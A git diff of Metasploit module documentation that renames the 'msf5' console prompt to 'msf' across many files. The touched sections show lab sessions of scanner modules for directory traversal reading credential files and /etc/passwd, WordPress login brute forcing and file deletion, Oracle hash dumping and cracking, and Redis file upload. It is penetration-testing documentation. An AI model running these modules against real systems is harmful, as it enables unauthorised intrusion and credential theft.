@@ -23,16 +23,16 @@ ### ThinVNC version 1.0b1 on Windows XP SP3 ``` - msf5 > use auxiliary/scanner/http/thinvnc_traversal - msf5 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 172.16.123.123 + msf > use auxiliary/scanner/http/thinvnc_traversal + msf auxiliary(scanner/http/thinvnc_traversal) > set rhosts 172.16.123.123 rhosts => 172.16.123.123 - msf5 auxiliary(scanner/http/thinvnc_traversal) > run + msf auxiliary(scanner/http/thinvnc_traversal) > run [+] File ThinVnc.ini saved in: /root/.msf4/loot/20191017033828_default_172.16.123.123_thinvnc.traversa_713640.txt [+] Found credentials: admin:admin [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/thinvnc_traversal) > + msf auxiliary(scanner/http/thinvnc_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/title.md b/documentation/modules/auxiliary/scanner/http/title.md index e6c4af42f4..5ed82c8817 100644 --- a/documentation/modules/auxiliary/scanner/http/title.md +++ b/documentation/modules/auxiliary/scanner/http/title.md @@ -23,10 +23,10 @@ If set to `false`, will not store the captured information in notes. Use `notes ### Apache/2.4.38 inside a Docker container ``` -msf5 > use auxiliary/scanner/http/title -msf5 auxiliary(scanner/http/title) > set RHOSTS 172.17.0.2 +msf > use auxiliary/scanner/http/title +msf auxiliary(scanner/http/title) > set RHOSTS 172.17.0.2 RHOSTS => 172.17.0.2 -msf5 auxiliary(scanner/http/title) > run +msf auxiliary(scanner/http/title) > run [+] [172.17.0.2:80] [C:200] [R:] [S:Apache/2.4.38 (Debian)] LOCAL TESTING [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/http/totaljs_traversal.md b/documentation/modules/auxiliary/scanner/http/totaljs_traversal.md index c7b7c6ca4c..68702c7013 100644 --- a/documentation/modules/auxiliary/scanner/http/totaljs_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/totaljs_traversal.md 
@@ -47,12 +47,12 @@ Affecting total.js package, versions: ### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0 ``` -msf5 > use auxiliary/scanner/http/totaljs_traversal -msf5 auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59 +msf > use auxiliary/scanner/http/totaljs_traversal +msf auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59 RHOST => 192.168.2.59 -msf5 auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320 +msf auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320 RPORT => 8320 -msf5 auxiliary(scanner/http/totaljs_traversal) > run +msf auxiliary(scanner/http/totaljs_traversal) > run [*] Running module against 192.168.2.59 [*] Total.js version is: ^3.2.0 @@ -60,5 +60,5 @@ msf5 auxiliary(scanner/http/totaljs_traversal) > run [*] App description: A simple and powerful CMS solution written in Total.js / Node.js. [*] App version: 12.0.0 [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/totaljs_traversal) > +msf auxiliary(scanner/http/totaljs_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md b/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md index dc3b930f63..09609de9a2 100644 --- a/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md 
@@ -18,14 +18,14 @@ This module exploits an unauthenticated directory traversal vulnerability which ### Tested against Windows 7 SP1 ``` -msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152 +msf auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152 RHOSTS => 192.168.43.152 -msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run +msf auxiliary(scanner/http/tvt_nvms_traversal) > run [+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/tvt_nvms_traversal) > +msf auxiliary(scanner/http/tvt_nvms_traversal) > ``` ## References diff --git a/documentation/modules/auxiliary/scanner/http/wordpress_scanner.md b/documentation/modules/auxiliary/scanner/http/wordpress_scanner.md index 7c542147c4..09a2134cdf 100644 --- a/documentation/modules/auxiliary/scanner/http/wordpress_scanner.md +++ b/documentation/modules/auxiliary/scanner/http/wordpress_scanner.md 
@@ -120,18 +120,18 @@ How often to print a prorgress bar while scanning for themes/plugins. Defaults Follow the Instructions above to setup the Docksal Containers. ``` -msf5 > use auxiliary/scanner/http/wordpress_scanner -msf5 auxiliary(scanner/http/wordpress_scanner) > set RHOSTS msf-wp.docksal +msf > use auxiliary/scanner/http/wordpress_scanner +msf auxiliary(scanner/http/wordpress_scanner) > set RHOSTS msf-wp.docksal RHOSTS => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_scanner) > set VHOST msf-wp.docksal +msf auxiliary(scanner/http/wordpress_scanner) > set VHOST msf-wp.docksal VHOST => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_scanner) > run +msf auxiliary(scanner/http/wordpress_scanner) > run [*] Trying 192.168.64.100 [+] 192.168.64.100 running Wordpress 5.2 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/wordpress_scanner) > +msf auxiliary(scanner/http/wordpress_scanner) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md b/documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md index 8c4698af97..7ab195f596 100644 --- a/documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md +++ b/documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md 
@@ -116,16 +116,16 @@ Try the username as the password for all users (default: `false`) Follow the Instructions above to setup the Docksal Containers. ``` -msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal +msf > use auxiliary/scanner/http/wordpress_xmlrpc_login +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal RHOST => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set VHOST msf-wp.docksal +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set VHOST msf-wp.docksal VHOST => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin USERNAME => admin -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin PASSWORD => admin -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > run [*] 192.168.64.100:80 :/xmlrpc.php - Sending Hello... [+] 192.168.64.100:80 - XMLRPC enabled, Hello message received! @@ -133,7 +133,7 @@ msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run [+] 192.168.64.100:80 - Success: 'admin:admin' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > ``` 
@@ -144,19 +144,19 @@ You may see this message also, if you forgot to set the `VHOST` option. ``` -msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal +msf > use auxiliary/scanner/http/wordpress_xmlrpc_login +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal RHOST => msf-wp.docksal -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin USERNAME => admin -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin PASSWORD => admin -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > run [*] 192.168.64.100:80 :/xmlrpc.php - Sending Hello... [-] XMLRPC is not enabled! Aborting [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > +msf auxiliary(scanner/http/wordpress_xmlrpc_login) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.md b/documentation/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.md index d8b038eb51..5471767553 100644 --- a/documentation/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.md +++ b/documentation/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.md 
@@ -18,18 +18,18 @@ WordPress <= 4.9.6 ## Scenarios ``` -msf5 > use auxiliary/scanner/http/wp_arbitrary_file_deletion -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set VERBOSE true +msf > use auxiliary/scanner/http/wp_arbitrary_file_deletion +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set VERBOSE true VERBOSE => true -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RPORT 8000 +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RPORT 8000 RPORT => 8000 -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RHOSTS 127.0.0.1 +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set PASSWORD xxx +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set PASSWORD xxx PASSWORD => password1 -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set USERNAME xxx +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > set USERNAME xxx USERNAME => techbrunch -msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > run +msf auxiliary(scanner/http/wp_arbitrary_file_deletion) > run [*] Checking if target is online and running Wordpress... [*] Checking access... @@ -39,4 +39,4 @@ msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > run [*] Deleting media... [+] File deleted! [*] Auxiliary module execution completed -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md b/documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md index 3152806bd0..edfbb4f23c 100644 --- a/documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md +++ b/documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md 
@@ -120,12 +120,12 @@ Traversal Depth (to reach the root folder) (default: `7`) Follow the Instructions above to setup the Docksal Containers. ```` -msf5 > use auxiliary/scanner/http/wp_dukapress_file_read -msf5 > set RHOST msf-wp.docksal +msf > use auxiliary/scanner/http/wp_dukapress_file_read +msf > set RHOST msf-wp.docksal RHOST => msf-wp.docksal -msf5 > set VHOST msf-wp.docksal +msf > set VHOST msf-wp.docksal VHOST => msf-wp.docksal -msf5 > run +msf > run [*] Downloading file... diff --git a/documentation/modules/auxiliary/scanner/http/wp_duplicator_file_read.md b/documentation/modules/auxiliary/scanner/http/wp_duplicator_file_read.md index d20c68b190..8b4c5eb658 100644 --- a/documentation/modules/auxiliary/scanner/http/wp_duplicator_file_read.md +++ b/documentation/modules/auxiliary/scanner/http/wp_duplicator_file_read.md @@ -24,17 +24,17 @@ Vulnerable version: [duplicator.1.3.24.zip](https://downloads.wordpress.org/plug ### Ubuntu 20.04 running WordPress 5.6, Duplicator 1.3.26 ``` -msf5 > use auxiliary/scanner/http/wp_duplicator_file_read -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > set rhosts 127.0.0.1 +msf > use auxiliary/scanner/http/wp_duplicator_file_read +msf auxiliary(scanner/http/wp_duplicator_file_read) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > set rport 8080 +msf auxiliary(scanner/http/wp_duplicator_file_read) > set rport 8080 rport => 8080 -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > set FILEPATH /etc/passwd +msf auxiliary(scanner/http/wp_duplicator_file_read) > set FILEPATH /etc/passwd FILEPATH => /etc/passwd -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > set DEPTH 5 +msf auxiliary(scanner/http/wp_duplicator_file_read) > set DEPTH 5 DEPTH => 5 -msf5 auxiliary(scanner/http/wp_duplicator_file_read) > run +msf auxiliary(scanner/http/wp_duplicator_file_read) > run [*] Downloading file... 
diff --git a/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md b/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md index 5a1bb756d8..e460595d88 100644 --- a/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md @@ -20,15 +20,15 @@ Zen load balancer before v3.10.1 is vulnerable to authenticated directory traver ## Scenarios ``` -msf5 > use auxiliary/scanner/http/zenload_balancer_traversal -msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101 +msf > use auxiliary/scanner/http/zenload_balancer_traversal +msf auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101 RHOSTS => 192.168.1.101 -msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true +msf auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true SSL => true -msf5 auxiliary(scanner/http/zenload_balancer_traversal) > run +msf auxiliary(scanner/http/zenload_balancer_traversal) > run [*] Running module against 192.168.1.101 [+] File saved in: /Users/Dhiraj/.msf4/loot/20200412142620_default_192.168.1.101_zenload.http_196293.txt [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/zenload_balancer_traversal) > +msf auxiliary(scanner/http/zenload_balancer_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/imap/imap_version.md b/documentation/modules/auxiliary/scanner/imap/imap_version.md index e8848616f2..cb6b960275 100644 --- a/documentation/modules/auxiliary/scanner/imap/imap_version.md +++ b/documentation/modules/auxiliary/scanner/imap/imap_version.md 
@@ -34,10 +34,10 @@ in a production environment. ### Dovecot 2.3.2 (582970113) on Kali ``` - msf5 > use auxiliary/scanner/imap/imap_version - msf5 auxiliary(scanner/imap/imap_version) > set rhosts 10.168.202.216 + msf > use auxiliary/scanner/imap/imap_version + msf auxiliary(scanner/imap/imap_version) > set rhosts 10.168.202.216 rhosts => 10.168.202.216 - msf5 auxiliary(scanner/imap/imap_version) > run + msf auxiliary(scanner/imap/imap_version) > run [+] 10.168.202.216:143 - 10.168.202.216:143 IMAP * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS AUTH=PLAIN] Dovecot (Debian) ready.\x0d\x0a [*] 10.168.202.216:143 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md b/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md index 7d5aef07d9..67268e3abc 100644 --- a/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md +++ b/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md @@ -54,10 +54,10 @@ docker run -ti --rm -p 11211:11211/udp memcached:1.5.5 Configure memcached as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_amp -msf5 auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_amp +msf auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_amp) > run +msf auxiliary(scanner/memcached/memcached_amp) > run [+] a.b.c.d:11211 - Vulnerable to MEMCACHED amplification: No packet amplification and a 78x, 1163-byte bandwidth amplification [*] Scanned 1 of 1 hosts (100% complete) 
@@ -69,10 +69,10 @@ msf5 auxiliary(scanner/memcached/memcached_amp) > run Configure memcached as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_amp -msf5 auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_amp +msf auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_amp) > run +msf auxiliary(scanner/memcached/memcached_amp) > run [+] a.b.c.d:11211 - Vulnerable to MEMCACHED amplification: No packet amplification and a 68x, 1015-byte bandwidth amplification [*] Scanned 1 of 1 hosts (100% complete) @@ -84,10 +84,10 @@ msf5 auxiliary(scanner/memcached/memcached_amp) > run Configure memcached in docker as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_amp -msf5 auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_amp +msf auxiliary(scanner/memcached/memcached_amp) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_amp) > run +msf auxiliary(scanner/memcached/memcached_amp) > run [+] a.b.c.d:11211 - Vulnerable to MEMCACHED amplification: 2x packet amplification and a 126x, 1880-byte bandwidth amplification [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/memcached/memcached_udp_version.md b/documentation/modules/auxiliary/scanner/memcached/memcached_udp_version.md index a7cbe63208..eba820441c 100644 --- a/documentation/modules/auxiliary/scanner/memcached/memcached_udp_version.md +++ b/documentation/modules/auxiliary/scanner/memcached/memcached_udp_version.md 
@@ -39,10 +39,10 @@ docker run -ti --rm -p 11211:11211/udp memcached:1.5.5 Configure memcached as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_udp_version -msf5 auxiliary(scanner/memcached/memcached_udp_version) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_udp_version +msf auxiliary(scanner/memcached/memcached_udp_version) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_udp_version) > run +msf auxiliary(scanner/memcached/memcached_udp_version) > run [+] a.b.c.d:11211/udp memcached version 1.4.15 [*] Scanned 1 of 1 hosts (100% complete) @@ -54,10 +54,10 @@ msf5 auxiliary(scanner/memcached/memcached_udp_version) > run Configure memcached in docker as described above. ``` -msf5 > use auxiliary/scanner/memcached/memcached_udp_version -msf5 auxiliary(scanner/memcached/memcached_udp_version) > set RHOSTS a.b.c.d +msf > use auxiliary/scanner/memcached/memcached_udp_version +msf auxiliary(scanner/memcached/memcached_udp_version) > set RHOSTS a.b.c.d RHOSTS => a.b.c.d -msf5 auxiliary(scanner/memcached/memcached_udp_version) > run +msf auxiliary(scanner/memcached/memcached_udp_version) > run [+] a.b.c.d:11211/udp memcached version 1.5.5 [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/misc/java_jmx_server.md b/documentation/modules/auxiliary/scanner/misc/java_jmx_server.md index 1fcc90c56a..6b43885854 100644 --- a/documentation/modules/auxiliary/scanner/misc/java_jmx_server.md +++ b/documentation/modules/auxiliary/scanner/misc/java_jmx_server.md 
@@ -35,9 +35,9 @@ docker restart `docker ps -q` Against the above-described Docker container, the workflow looks like: ``` -msf5 auxiliary(scanner/misc/java_jmx_server) > set RHOST 127.0.0.1 -msf5 auxiliary(scanner/misc/java_jmx_server) > set RPORT 1099 -msf5 auxiliary(scanner/misc/java_jmx_server) > run +msf auxiliary(scanner/misc/java_jmx_server) > set RHOST 127.0.0.1 +msf auxiliary(scanner/misc/java_jmx_server) > set RPORT 1099 +msf auxiliary(scanner/misc/java_jmx_server) > run [*] Reloading module... [*] 127.0.0.1:1099 - Sending RMI header... @@ -49,7 +49,7 @@ msf5 auxiliary(scanner/misc/java_jmx_server) > run In addition, note that `services` within the data model has been updated: ``` -msf5 auxiliary(scanner/misc/java_jmx_server) > services +msf auxiliary(scanner/misc/java_jmx_server) > services Services ======== diff --git a/documentation/modules/auxiliary/scanner/msmail/host_id.md b/documentation/modules/auxiliary/scanner/msmail/host_id.md index f82f54f749..e80178ef5b 100644 --- a/documentation/modules/auxiliary/scanner/msmail/host_id.md +++ b/documentation/modules/auxiliary/scanner/msmail/host_id.md @@ -21,10 +21,10 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks. *Results should look like below:* ``` -msf5 > use auxiliary/scanner/msmail/host_id -msf5 auxiliary(scanner/msmail/host_id) > set RHOSTS +msf > use auxiliary/scanner/msmail/host_id +msf auxiliary(scanner/msmail/host_id) > set RHOSTS RHOSTS => -msf5 auxiliary(scanner/msmail/host_id) > run +msf auxiliary(scanner/msmail/host_id) > run [*] Running for ... [*] Attempting to harvest internal domain: @@ -39,4 +39,4 @@ msf5 auxiliary(scanner/msmail/host_id) > run [*] [+] https:///oab [*] [+] https:///ews -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md b/documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md index 41cce12d90..30f23bb3d5 100644 
--- a/documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md +++ b/documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md @@ -53,10 +53,10 @@ ## Scenarios -### Running Oracle 12c on a local Windows 10 machine, and MSF5 on Ubuntu for Windows (same machine) +### Running Oracle 12c on a local Windows 10 machine, and msf on Ubuntu for Windows (same machine) ``` -msf5 auxiliary(scanner/oracle/oracle_hashdump) > show options +msf auxiliary(scanner/oracle/oracle_hashdump) > show options Module options (auxiliary/scanner/oracle/oracle_hashdump): Name Current Setting Required Description @@ -69,7 +69,7 @@ Module options (auxiliary/scanner/oracle/oracle_hashdump): SID staticdb yes The sid to authenticate with. THREADS 1 yes The number of concurrent threads -msf5 auxiliary(scanner/oracle/oracle_hashdump) > run +msf auxiliary(scanner/oracle/oracle_hashdump) > run [*] Server is running 12c [*] Hash table : @@ -85,7 +85,7 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run [+] Hash Table has been saved [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds +msf auxiliary(scanner/oracle/oracle_hashdump) > creds Credentials =========== @@ -98,8 +98,8 @@ host origin service public private These hashes are then saved as credentials so that `jtr_oracle_fast` can crack them (using [John The Ripper "bleeding_jumbo"](https://github.com/magnumripper/JohnTheRipper)). ``` -msf5 auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast -msf5 auxiliary(analyze/jtr_oracle_fast) > run +msf auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast +msf auxiliary(analyze/jtr_oracle_fast) > run ... [*] Cracking oracle12c hashes in normal wordlist mode... Using default input encoding: UTF-8 
@@ -139,9 +139,9 @@ resource (oracle.rb)> set dbpass oracle dbpass => oracle resource (oracle.rb)> set sid XE sid => XE -msf5 auxiliary(scanner/oracle/oracle_hashdump) > set verbose true +msf auxiliary(scanner/oracle/oracle_hashdump) > set verbose true verbose => true -msf5 auxiliary(scanner/oracle/oracle_hashdump) > run +msf auxiliary(scanner/oracle/oracle_hashdump) > run [*] Server is running version 11g [*] Hash table : diff --git a/documentation/modules/auxiliary/scanner/pop3/pop3_version.md b/documentation/modules/auxiliary/scanner/pop3/pop3_version.md index 1283ff5e9c..5470f4fb11 100644 --- a/documentation/modules/auxiliary/scanner/pop3/pop3_version.md +++ b/documentation/modules/auxiliary/scanner/pop3/pop3_version.md @@ -24,9 +24,9 @@ in a production environment. ### Dovecot 2.3.2 (582970113) on Kali ``` - msf5 auxiliary(scanner/pop3/pop3_version) > use auxiliary/scanner/pop3/pop3_version - msf5 auxiliary(scanner/pop3/pop3_version) > set rhosts 10.168.202.216 - msf5 auxiliary(scanner/pop3/pop3_version) > run + msf auxiliary(scanner/pop3/pop3_version) > use auxiliary/scanner/pop3/pop3_version + msf auxiliary(scanner/pop3/pop3_version) > set rhosts 10.168.202.216 + msf auxiliary(scanner/pop3/pop3_version) > run [+] 10.168.202.216:110 - 10.168.202.216:110 POP3 +OK Dovecot (Debian) ready.\x0d\x0a [*] 10.168.202.216:110 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/redis/file_upload.md b/documentation/modules/auxiliary/scanner/redis/file_upload.md index 1107eee9ad..628c533c7b 100644 --- a/documentation/modules/auxiliary/scanner/redis/file_upload.md +++ b/documentation/modules/auxiliary/scanner/redis/file_upload.md 
@@ -42,13 +42,13 @@ Path, or file name, to store the file as on the Redis server. ### Redis: 4.0.14 inside a docker container ``` -msf5 auxiliary(scanner/redis/file_upload) > set RHOSTS 172.17.0.2 +msf auxiliary(scanner/redis/file_upload) > set RHOSTS 172.17.0.2 RHOSTS => 172.17.0.2 -msf5 auxiliary(scanner/redis/file_upload) > set LocalFile redis_upload_test.txt +msf auxiliary(scanner/redis/file_upload) > set LocalFile redis_upload_test.txt LocalFile => redis_upload_test.txt -msf5 auxiliary(scanner/redis/file_upload) > set RemoteFile redis_upload_test.txt +msf auxiliary(scanner/redis/file_upload) > set RemoteFile redis_upload_test.txt RemoteFile => redis_upload_test.txt -msf5 auxiliary(scanner/redis/file_upload) > run +msf auxiliary(scanner/redis/file_upload) > run [+] 172.17.0.2:6379 - 172.17.0.2:6379 -- saved 23 bytes inside of redis DB at redis_upload_test.txt [*] 172.17.0.2:6379 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/redis/redis_server.md b/documentation/modules/auxiliary/scanner/redis/redis_server.md index 49137c87bf..d1548fd6f0 100644 --- a/documentation/modules/auxiliary/scanner/redis/redis_server.md +++ b/documentation/modules/auxiliary/scanner/redis/redis_server.md 
@@ -30,10 +30,10 @@ Redis commands list can be found [here](https://redis.io/commands). ### Redis: 4.0.14 inside a docker container ``` -msf5 auxiliary(scanner/redis/redis_server) > use auxiliary/scanner/redis/redis_server -msf5 auxiliary(scanner/redis/redis_server) > set RHOSTS 172.17.0.3 +msf auxiliary(scanner/redis/redis_server) > use auxiliary/scanner/redis/redis_server +msf auxiliary(scanner/redis/redis_server) > set RHOSTS 172.17.0.3 RHOSTS => 172.17.0.3 -msf5 auxiliary(scanner/redis/redis_server) > run +msf auxiliary(scanner/redis/redis_server) > run [+] 172.17.0.3:6379 - Found redis with INFO command: $2701\x0d\x0a# Server\x0d\x0aredis_version:4.0.14\x0d\x0aredis_git_sha1:00000000\x0d\x0aredis_git_dirty:0\x0d\x0aredis_build_id:30850c2ae048947f\x0d\x0aredis_mode:standalone\x0d\x0aos:Linux 4.19.69-1-MANJARO x86_64\x0d\x0aarch_bits:64\x0d\x0amultiplexing_api:epoll\x0d\x0aatomicvar_api:atomic-builtin\x0d\x0agcc_version:8.3.0\x0d\x0aprocess_id:1\x0d\x0arun_id:de1d3d4547ce93ecad76de2efdbcf7ae2d456613\x0d\x0atcp_port:6379\x0d\x0auptime_in_seconds:564\x0d\x0auptime_in_days:0\x0d\x0ahz:10\x0d\x0alru_clock:10154159\x0d\x0aexecutable:/data/redis-server\x0d\x0aconfig_file:\x0d\x0a\x0d\x0a# Clients\x0d\x0aconnected_clients:1\x0d\x0aclient_longest_output_list:0\x0d\x0aclient_biggest_input_buf:0\x0d\x0ablocked_clients:0\x0d\x0a\x0d\x0a# 
Memory\x0d\x0aused_memory:849224\x0d\x0aused_memory_human:829.32K\x0d\x0aused_memory_rss:4464640\x0d\x0aused_memory_rss_human:4.26M\x0d\x0aused_memory_peak:849224\x0d\x0aused_memory_peak_human:829.32K\x0d\x0aused_memory_peak_perc:100.00%\x0d\x0aused_memory_overhead:836126\x0d\x0aused_memory_startup:786488\x0d\x0aused_memory_dataset:13098\x0d\x0aused_memory_dataset_perc:20.88%\x0d\x0atotal_system_memory:12010311680\x0d\x0atotal_system_memory_human:11.19G\x0d\x0aused_memory_lua:37888\x0d\x0aused_memory_lua_human:37.00K\x0d\x0amaxmemory:0\x0d\x0amaxmemory_human:0B\x0d\x0amaxmemory_policy:noeviction\x0d\x0amem_fragmentation_ratio:5.26\x0d\x0amem_allocator:jemalloc-4.0.3\x0d\x0aactive_defrag_running:0\x0d\x0alazyfree_pending_objects:0\x0d\x0a\x0d\x0a# Persistence\x0d\x0aloading:0\x0d\x0ardb_changes_since_last_save:0\x0d\x0ardb_bgsave_in_progress:0\x0d\x0ardb_last_save_time:1570434683\x0d\x0ardb_last_bgsave_status:ok\x0d\x0ardb_last_bgsave_time_sec:-1\x0d\x0ardb_current_bgsave_time_sec:-1\x0d\x0ardb_last_cow_size:0\x0d\x0aaof_enabled:0\x0d\x0aaof_rewrite_in_progress:0\x0d\x0aaof_rewrite_scheduled:0\x0d\x0aaof_last_rewrite_time_sec:-1\x0d\x0aaof_current_rewrite_time_sec:-1\x0d\x0aaof_last_bgrewrite_status:ok\x0d\x0aaof_last_write_status:ok\x0d\x0aaof_last_cow_size:0\x0d\x0a\x0d\x0a# 
